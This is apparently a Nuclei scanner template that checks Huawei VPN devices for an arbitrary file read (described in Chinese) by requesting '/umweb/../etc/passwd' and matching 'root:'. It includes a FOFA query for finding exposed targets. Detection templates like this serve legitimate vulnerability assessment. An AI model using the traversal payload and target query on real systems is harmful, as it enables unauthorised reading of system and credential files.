http:
    - matchers:
        - type: word
          words:
            - 'root:'
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{RootURL}}/umweb/../etc/passwd'
        - '{{RootURL}}/umweb/passwd'
      stop-at-first-match: true
id: huawei-vpn-umweb-fileread
info:
    author: hufei
    description: 华为vpn任意文件读取
    metadata:
        fofa-qeury: server="Huawei Auth-Http Server 1.0"
        veified: true
    name: 华为vpn任意文件读取
    severity: medium
    tags:
        - huawei
        - vpn
        - fileread
        - iot
        - HuaWei-VPN
